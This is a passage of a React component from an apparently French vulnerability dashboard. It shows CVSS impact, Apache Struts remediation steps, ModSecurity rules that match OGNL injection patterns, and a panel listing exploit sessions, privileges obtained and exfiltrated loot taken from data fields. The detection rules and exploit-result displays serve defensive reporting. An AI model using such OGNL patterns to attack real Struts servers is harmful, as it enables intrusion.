                       vulnerability.impact_confidentiality || t('vulnerabilities.impactNone')}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.integrityImpact')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.impact_integrity === 'High'
                        ? 'bg-red-500/20 text-red-400'
                        : vulnerability.impact_integrity === 'Low'
                        ? 'bg-yellow-500/20 text-yellow-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      <Shield className="w-4 h-4" />
                      {vulnerability.impact_integrity === 'High' ? t('vulnerabilities.impactFull') :
                       vulnerability.impact_integrity === 'Low' ? t('vulnerabilities.impactPartial') :
                       vulnerability.impact_integrity || t('vulnerabilities.impactNone')}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.availabilityImpact')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.impact_availability === 'High'
                        ? 'bg-red-500/20 text-red-400'
                        : vulnerability.impact_availability === 'Low'
                        ? 'bg-yellow-500/20 text-yellow-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      <Activity className="w-4 h-4" />
                      {vulnerability.impact_availability === 'High' ? t('vulnerabilities.impactFull') :
                       vulnerability.impact_availability === 'Low' ? t('vulnerabilities.impactPartial') :
                       vulnerability.impact_availability || t('vulnerabilities.impactNone')}
                    </span>
                  </td>
                </tr>
              </tbody>
            </table>
          </div>

          {/* Score CVSS visual */}
          <div className="mt-4 flex items-center justify-between bg-brand-black rounded-lg p-4 border border-gray-800">
            <div className="flex items-center gap-3">
              <div className={`w-16 h-16 rounded-full flex items-center justify-center font-bold text-xl ${
                vulnerability.cvss_score >= 9 ? 'bg-red-500/20 text-red-400 border-2 border-red-500' :
                vulnerability.cvss_score >= 7 ? 'bg-orange-500/20 text-orange-400 border-2 border-orange-500' :
                vulnerability.cvss_score >= 4 ? 'bg-yellow-500/20 text-yellow-400 border-2 border-yellow-500' :
                'bg-green-500/20 text-green-400 border-2 border-green-500'
              }`}>
                {vulnerability.cvss_score}
              </div>
              <div>
                <div className="text-white font-medium">{t('vulnerabilities.scoreCvss')}</div>
                <div className={`text-sm font-bold ${
                  vulnerability.cvss_score >= 9 ? 'text-red-400' :
                  vulnerability.cvss_score >= 7 ? 'text-orange-400' :
                  vulnerability.cvss_score >= 4 ? 'text-yellow-400' :
                  'text-green-400'
                }`}>
                  {vulnerability.cvss_score >= 9 ? t('vulnerabilities.severities.critical').toUpperCase() :
                   vulnerability.cvss_score >= 7 ? t('vulnerabilities.severities.high').toUpperCase() :
                   vulnerability.cvss_score >= 4 ? t('vulnerabilities.severities.medium').toUpperCase() : t('vulnerabilities.severities.low').toUpperCase()}
                </div>
              </div>
            </div>
            <div className="flex-1 mx-6">
              <div className="h-3 bg-gray-800 rounded-full overflow-hidden">
                <div
                  className={`h-full rounded-full transition-all duration-500 ${
                    vulnerability.cvss_score >= 9 ? 'bg-red-500' :
                    vulnerability.cvss_score >= 7 ? 'bg-orange-500' :
                    vulnerability.cvss_score >= 4 ? 'bg-yellow-500' :
                    'bg-green-500'
                  }`}
                  style={{ width: `${vulnerability.cvss_score * 10}%` }}
                />
              </div>
              <div className="flex justify-between text-xs text-gray-500 mt-1">
                <span>0</span>
                <span>10</span>
              </div>
            </div>
          </div>
        </div>

        {/* Remediation - ENRICHED */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-brand-green/30">
          <div className="flex items-center gap-2 mb-6">
            <Shield className="w-5 h-5 text-brand-green" />
            <h2 className="text-xl font-bold text-brand-green">{t('vulnerabilities.remediation')}</h2>
          </div>

          {/* Summary */}
          <div className="bg-brand-green/10 border border-brand-green/30 rounded-lg p-4 mb-6">
            <h3 className="text-brand-green font-medium mb-2 flex items-center gap-2">
              <CheckCircle className="w-4 h-4" />
              {t('vulnerabilities.remediationSummary')}
            </h3>
            <p className="text-white">{vulnerability.remediation}</p>
          </div>

          {/* Tool Output / Evidence */}
          {vulnerability.tool_output && (
            <div className="bg-gray-900/50 border border-gray-700/50 rounded-lg p-4 mb-6">
              <h3 className="text-gray-300 font-medium mb-2 flex items-center gap-2">
                <Terminal className="w-4 h-4 text-brand-green" />
                {t('vulnerabilities.details.exploitProof')}
              </h3>
              <pre className="text-xs text-green-400 font-mono whitespace-pre-wrap break-all bg-black/40 rounded p-3 max-h-48 overflow-y-auto">{vulnerability.tool_output}</pre>
            </div>
          )}

          {/* Priority & Timeline */}
          <div className="grid grid-cols-1 md:grid-cols-3 gap-4 mb-6">
            <div className="bg-red-500/10 border border-red-500/30 rounded-lg p-4">
              <div className="flex items-center gap-2 mb-2">
                <AlertTriangle className="w-4 h-4 text-red-400" />
                <span className="text-sm font-medium text-red-400">{t('vulnerabilities.priority')}</span>
              </div>
              <span className="text-xl font-bold text-white">{t('vulnerabilities.severities.critical').toUpperCase()}</span>
              <p className="text-xs text-gray-400 mt-1">{t('vulnerabilities.immediateFix')}</p>
            </div>
            <div className="bg-yellow-500/10 border border-yellow-500/30 rounded-lg p-4">
              <div className="flex items-center gap-2 mb-2">
                <Clock className="w-4 h-4 text-yellow-400" />
                <span className="text-sm font-medium text-yellow-400">{t('vulnerabilities.remediationRecommendedDelay')}</span>
              </div>
              <span className="text-xl font-bold text-white">24-48h</span>
              <p className="text-xs text-gray-400 mt-1">{t('vulnerabilities.remediationMaxWindow')}</p>
            </div>
            <div className="bg-blue-500/10 border border-blue-500/30 rounded-lg p-4">
              <div className="flex items-center gap-2 mb-2">
                <Activity className="w-4 h-4 text-blue-400" />
                <span className="text-sm font-medium text-blue-400">{t('vulnerabilities.remediationImpact')}</span>
              </div>
              <span className="text-xl font-bold text-white">{t('vulnerabilities.remediationHighImpact')}</span>
              <p className="text-xs text-gray-400 mt-1">{t('vulnerabilities.remediationRestartRequired')}</p>
            </div>
          </div>

          {/* Detailed Steps */}
          <div className="mb-6">
            <h3 className="text-sm font-medium text-gray-400 mb-4 flex items-center gap-2">
              <Wrench className="w-4 h-4" />
              {t('vulnerabilities.remediationStepsTitle')}
            </h3>
            <div className="space-y-4">
              {/* Step 1 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">1</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step1Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">~15 min</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step1Desc')}</p>
                  <div className="bg-gray-900 rounded p-3 font-mono text-xs">
                    <div className="text-gray-500"># Sauvegarde de la configuration Struts</div>
                    <div className="text-green-400">$ cp -r /opt/struts2/conf /opt/struts2/conf.backup.$(date +%Y%m%d)</div>
                    <div className="text-green-400">$ tar -czvf struts2_backup.tar.gz /opt/struts2/</div>
                  </div>
                  <ul className="text-xs text-gray-400 space-y-1">
                    <li className="flex items-center gap-2"><ChevronRight className="w-3 h-3 text-brand-green" /> {t('vulnerabilities.step1Li1')}</li>
                    <li className="flex items-center gap-2"><ChevronRight className="w-3 h-3 text-brand-green" /> {t('vulnerabilities.step1Li2')}</li>
                    <li className="flex items-center gap-2"><ChevronRight className="w-3 h-3 text-brand-green" /> {t('vulnerabilities.step1Li3')}</li>
                  </ul>
                </div>
              </div>

              {/* Step 2 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">2</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step2Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">~30 min</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step2Desc')}</p>
                  <div className="bg-gray-900 rounded p-3 font-mono text-xs">
                    <div className="text-gray-500"># Telecharger Struts 2.5.33 (version corrigee)</div>
                    <div className="text-green-400">$ wget https://dlcdn.apache.org/struts/2.5.33/struts-2.5.33-all.zip</div>
                    <div className="text-green-400">$ unzip struts-2.5.33-all.zip</div>
                    <div className="text-gray-500"># Arreter le service</div>
                    <div className="text-green-400">$ systemctl stop tomcat</div>
                    <div className="text-gray-500"># Remplacer les librairies</div>
                    <div className="text-green-400">$ cp struts-2.5.33/lib/*.jar /opt/tomcat/webapps/ROOT/WEB-INF/lib/</div>
                  </div>
                  <div className="bg-yellow-500/10 border border-yellow-500/30 rounded p-3">
                    <p className="text-xs text-yellow-400"><AlertTriangle className="w-3 h-3 inline mr-1" /> {t('vulnerabilities.step2Warning')}</p>
                  </div>
                </div>
              </div>

              {/* Step 3 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">3</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step3Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">~20 min</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step3Desc')}</p>
                  <div className="bg-gray-900 rounded p-3 font-mono text-xs">
                    <div className="text-gray-500"># Regle ModSecurity pour bloquer OGNL injection</div>
                    <div className="text-green-400">SecRule REQUEST_HEADERS:Content-Type "@contains ognl" \</div>
                    <div className="text-green-400">  "id:1001,phase:1,deny,status:403,msg:'OGNL Injection Attempt'"</div>
                    <div className="text-green-400">SecRule ARGS "@rx (\#_memberAccess|\#context)" \</div>
                    <div className="text-green-400">  "id:1002,phase:2,deny,status:403,msg:'Struts2 RCE Attempt'"</div>
                  </div>
                </div>
              </div>

              {/* Step 4 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">4</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step4Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">~15 min</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step4Desc')}</p>
                  <div className="bg-gray-900 rounded p-3 font-mono text-xs">
                    <div className="text-gray-500"># struts.xml - Disable dangerous features</div>
                    <div className="text-blue-400">&lt;constant name="struts.ognl.allowStaticMethodAccess" value="false"/&gt;</div>
                    <div className="text-blue-400">&lt;constant name="struts.devMode" value="false"/&gt;</div>
                    <div className="text-blue-400">&lt;constant name="struts.enable.DynamicMethodInvocation" value="false"/&gt;</div>
                  </div>
                </div>
              </div>

              {/* Step 5 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">5</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step5Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">~10 min</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step5Desc')}</p>
                  <div className="bg-gray-900 rounded p-3 font-mono text-xs">
                    <div className="text-green-400">$ systemctl start tomcat</div>
                    <div className="text-green-400">$ systemctl status tomcat</div>
                    <div className="text-gray-500"># Check logs</div>
                    <div className="text-green-400">$ tail -f /var/log/tomcat/catalina.out</div>
                  </div>
                  <ul className="text-xs text-gray-400 space-y-1">
                    <li className="flex items-center gap-2"><CheckCircle className="w-3 h-3 text-green-400" /> {t('vulnerabilities.step5Li1')}</li>
                    <li className="flex items-center gap-2"><CheckCircle className="w-3 h-3 text-green-400" /> {t('vulnerabilities.step5Li2')}</li>
                    <li className="flex items-center gap-2"><CheckCircle className="w-3 h-3 text-green-400" /> {t('vulnerabilities.step5Li3')}</li>
                  </ul>
                </div>
              </div>

              {/* Step 6 */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-3">
                  <span className="w-8 h-8 rounded-full bg-brand-green/20 text-brand-green flex items-center justify-center font-bold">6</span>
                  <span className="text-white font-medium">{t('vulnerabilities.step6Title')}</span>
                  <span className="ml-auto text-xs text-gray-500">Continu</span>
                </div>
                <div className="p-4 space-y-3">
                  <p className="text-sm text-gray-300">{t('vulnerabilities.step6Desc')}</p>
                  <ul className="text-sm text-gray-300 space-y-2">
                    <li className="flex items-start gap-2">
                      <ChevronRight className="w-4 h-4 text-brand-green mt-0.5" />
                      <span>{t('vulnerabilities.step6Li1')}</span>
                    </li>
                    <li className="flex items-start gap-2">
                      <ChevronRight className="w-4 h-4 text-brand-green mt-0.5" />
                      <span>{t('vulnerabilities.step6Li2')}</span>
                    </li>
                    <li className="flex items-start gap-2">
                      <ChevronRight className="w-4 h-4 text-brand-green mt-0.5" />
                      <span>{t('vulnerabilities.step6Li3')}</span>
                    </li>
                    <li className="flex items-start gap-2">
                      <ChevronRight className="w-4 h-4 text-brand-green mt-0.5" />
                      <span>{t('vulnerabilities.step6Li4')}</span>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
          </div>

          {/* Workaround if patching not possible */}
          <div className="bg-yellow-500/10 border border-yellow-500/30 rounded-lg p-4 mb-6">
            <h3 className="text-yellow-400 font-medium mb-2 flex items-center gap-2">
              <AlertTriangle className="w-4 h-4" />
              {t('vulnerabilities.workaroundTitle')}
            </h3>
            <p className="text-sm text-gray-300 mb-3">{t('vulnerabilities.workaroundDesc')}</p>
            <ul className="text-sm text-gray-300 space-y-2">
              <li className="flex items-start gap-2">
                <span className="text-yellow-400">1.</span>
                <span>{t('vulnerabilities.workaround1')}</span>
              </li>
              <li className="flex items-start gap-2">
                <span className="text-yellow-400">2.</span>
                <span>{t('vulnerabilities.workaround2')}</span>
              </li>
              <li className="flex items-start gap-2">
                <span className="text-yellow-400">3.</span>
                <span>{t('vulnerabilities.workaround3')}</span>
              </li>
              <li className="flex items-start gap-2">
                <span className="text-yellow-400">4.</span>
                <span>{t('vulnerabilities.workaround4')}</span>
              </li>
            </ul>
          </div>

          {/* References */}
          <div>
            <h3 className="text-sm font-medium text-gray-400 mb-3 flex items-center gap-2">
              <BookOpen className="w-4 h-4" />
              {t('vulnerabilities.references')}
            </h3>
            <div className="grid grid-cols-1 md:grid-cols-2 gap-3">
              {vulnerability.references && vulnerability.references.map((ref, idx) => (
                <a
                  key={idx}
                  href={ref.url}
                  target="_blank"
                  rel="noopener noreferrer"
                  className="flex items-center gap-3 p-3 bg-brand-black rounded-lg border border-gray-800 hover:border-brand-green/50 transition-colors group"
                >
                  <ExternalLink className="w-4 h-4 text-gray-500 group-hover:text-brand-green" />
                  <span className="text-sm text-gray-300 group-hover:text-white">{ref.title}</span>
                </a>
              ))}
            </div>
          </div>
        </div>
      </div>
      </div>

      {/* Attack Details Slider */}
      {sliderOpen && selectedAttack && (
        <>
          {/* Overlay */}
          <div
            className="fixed inset-0 bg-black/60 backdrop-blur-sm z-40 transition-opacity"
            onClick={() => setSliderOpen(false)}
          />

          {/* Slider Panel */}
          <div className="fixed right-0 top-0 h-full w-[600px] max-w-[90vw] bg-brand-black-light border-l border-brand-green/30 z-50 overflow-hidden flex flex-col shadow-2xl transform transition-transform">
            {/* Slider Header */}
            <div className="bg-gradient-to-r from-green-900/50 to-brand-black-light px-6 py-4 border-b border-green-500/30 flex items-center justify-between flex-shrink-0">
              <div className="flex items-center gap-3">
                <div className="w-10 h-10 rounded-full bg-green-500/20 flex items-center justify-center">
                  <Terminal className="w-5 h-5 text-green-400" />
                </div>
                <div>
                  <h2 className="text-lg font-bold text-white">{t('vulnerabilities.attackDetails')}</h2>
                  <p className="text-xs text-gray-400">{selectedAttack.exploit_name}</p>
                </div>
              </div>
              <button
                onClick={() => setSliderOpen(false)}
                className="p-2 hover:bg-brand-black rounded-lg transition-colors"
              >
                <X className="w-5 h-5 text-gray-400 hover:text-white" />
              </button>
            </div>

            {/* Slider Content - Scrollable */}
            <div className="flex-1 overflow-y-auto p-6 space-y-6">
              {/* Status Banner */}
              <div className={`rounded-lg p-4 flex items-center justify-between ${
                selectedAttack.status === 'success'
                  ? 'bg-green-500/10 border border-green-500/30'
                  : 'bg-red-500/10 border border-red-500/30'
              }`}>
                <div className="flex items-center gap-3">
                  <div className={`w-4 h-4 rounded-full ${
                    selectedAttack.status === 'success' ? 'bg-green-500 animate-pulse' : 'bg-red-500'
                  }`}></div>
                  <div>
                    <span className={`font-bold ${
                      selectedAttack.status === 'success' ? 'text-green-400' : 'text-red-400'
                    }`}>
                      {selectedAttack.status === 'success' ? t('vulnerabilities.exploitReussie') : t('vulnerabilities.exploitEchec')}
                    </span>
                    <p className="text-xs text-gray-400">
                      Session {selectedAttack.session_type} #{selectedAttack.session_id}
                    </p>
                  </div>
                </div>
                <div className="text-right">
                  <span className="text-xs text-gray-500">{t('vulnerabilities.dureeDuration')}</span>
                  <p className="text-white font-mono">{selectedAttack.duration}</p>
                </div>
              </div>

              {/* Target Information */}
              <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-2">
                  <Target className="w-4 h-4 text-red-400" />
                  <span className="text-white font-medium">{t('vulnerabilities.targetInfo')}</span>
                </div>
                <div className="p-4">
                  <div className="flex items-center gap-2 text-white font-mono mb-2">
                    <Network className="w-4 h-4 text-gray-500" />
                    <span>{selectedAttack.target}</span>
                  </div>
                  <div className="text-xs text-gray-500">
                    {new Date(selectedAttack.timestamp).toLocaleString()}
                  </div>
                </div>
              </div>

              {/* System Information */}
              {selectedAttack.system_info && (
                <div className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                  <div className="bg-gray-800/50 px-4 py-2 flex items-center gap-2">
                    <Monitor className="w-4 h-4 text-blue-400" />
                    <span className="text-white font-medium">{t('vulnerabilities.systemInfoTitle')}</span>
                  </div>
                  <div className="p-4 grid grid-cols-2 gap-4">
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.hostnameLabel')}</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.hostname}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">OS</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.os}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.architectureLabel')}</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.architecture}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.ipLabel')}</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.ip}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.initialUserLabel')}</span>
                      <span className="text-yellow-400 font-mono text-sm">{selectedAttack.system_info.user}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.privilegesObtained')}</span>
                      <span className="text-red-400 font-mono text-sm font-bold">{selectedAttack.system_info.elevated_user}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">{t('vulnerabilities.domainLabel')}</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.domain}</span>
                    </div>
                    <div>
                      <span className="text-xs text-gray-500 block">MAC Address</span>
                      <span className="text-white font-mono text-sm">{selectedAttack.system_info.mac}</span>
                    </div>
                  </div>
                </div>
              )}

              {/* Loot / Extracted Data */}
              {selectedAttack.loot && selectedAttack.loot.length > 0 && (
                <div className="bg-brand-black rounded-lg border border-yellow-500/30 overflow-hidden">
                  <div className="bg-yellow-500/10 px-4 py-2 flex items-center gap-2">
                    <Key className="w-4 h-4 text-yellow-400" />
                    <span className="text-yellow-400 font-medium">{t('vulnerabilities.exfiltratedData', { count: selectedAttack.loot.length })}</span>
                  </div>
                  <div className="p-4 space-y-2">
                    {selectedAttack.loot.map((item, idx) => (
                      <div key={idx} className="flex items-center justify-between py-2 px-3 bg-gray-800/50 rounded">
                        <div className="flex items-center gap-3">
                          <span className={`w-2 h-2 rounded-full ${
                            item.type === 'credentials' ? 'bg-red-500' :
                            item.type === 'database' ? 'bg-blue-500' : 'bg-yellow-500'
                          }`}></span>
                          <span className="text-white font-mono text-sm">{item.file}</span>
                        </div>
                        <div className="flex items-center gap-3">
                          <span className="text-xs text-gray-500">{item.size}</span>
                          <span className={`px-2 py-0.5 text-xs rounded ${
                            item.type === 'credentials' ? 'bg-red-500/20 text-red-400' :
                            item.type === 'database' ? 'bg-blue-500/20 text-blue-400' :
                            'bg-yellow-500/20 text-yellow-400'
                          }`}>{item.type}</span>
                        </div>
                      </div>
                    ))}
                  </div>
                </div>
              )}

              {/* Screenshots / Terminal Captures */}
              {selectedAttack.screenshots && selectedAttack.screenshots.length > 0 && (
                <div className="space-y-4">
                  <div className="flex items-center gap-2">
                    <Camera className="w-5 h-5 text-green-400" />
                    <h3 className="text-lg font-bold text-green-400">
                      {t('vulnerabilities.proofCaptures', { count: selectedAttack.screenshots.length })}
                    </h3>
                  </div>

                  {selectedAttack.screenshots.map((screenshot, idx) => (
                    <div key={screenshot.id} className="bg-brand-black rounded-lg border border-gray-700 overflow-hidden">
                      {/* Screenshot Header */}
                      <div className="bg-gray-800 px-4 py-3 flex items-center justify-between">
                        <div className="flex items-center gap-3">
                          <div className="flex items-center gap-1">
                            <div className="w-3 h-3 rounded-full bg-red-500"></div>
                            <div className="w-3 h-3 rounded-full bg-yellow-500"></div>
                            <div className="w-3 h-3 rounded-full bg-green-500"></div>
                          </div>
                          <span className="text-white font-medium text-sm">
                            {idx + 1}. {screenshot.title}
                          </span>
                        </div>
                        <span className="text-xs text-gray-500">
                          {new Date(screenshot.timestamp).toLocaleTimeString()}
                        </span>
                      </div>

                      {/* Screenshot Description */}
                      <div className="px-4 py-2 border-b border-gray-700 bg-gray-900/50">
                        <p className="text-xs text-gray-400">{screenshot.description}</p>
                      </div>

                      {/* Terminal Output */}
                      <div className="bg-black p-4 overflow-x-auto">
                        <pre className="text-xs font-mono text-green-400 whitespace-pre-wrap">
                          {screenshot.terminal_output}
                        </pre>
                      </div>
                    </div>
                  ))}
                </div>
              )}
            </div>

            {/* Slider Footer */}
            <div className="border-t border-gray-800 px-6 py-4 bg-brand-black flex-shrink-0">
              <div className="flex items-center justify-between">
                <div className="flex items-center gap-2 text-xs text-gray-500">
                  <Fingerprint className="w-4 h-4" />
                  <span>{t('vulnerabilities.sessionId')}: {selectedAttack.session_id}</span>
                </div>
                <div className="flex items-center gap-2">
                  <button className="px-4 py-2 bg-brand-green/10 text-brand-green rounded-lg text-sm hover:bg-brand-green/20 flex items-center gap-2">
                    <Download className="w-4 h-4" />
                    {t('vulnerabilities.exportPdf')}
                  </button>
                  <button
                    onClick={() => setSliderOpen(false)}
                    className="px-4 py-2 bg-gray-700 hover:bg-gray-600 text-white rounded-lg text-sm flex items-center gap-2"
                  >
                    <X className="w-4 h-4" />
                    {t('common.close')}
                  </button>
                </div>
              </div>
            </div>
          </div>
        </>
      )}
    </div>
  );
};

export default VulnerabilityDetails;
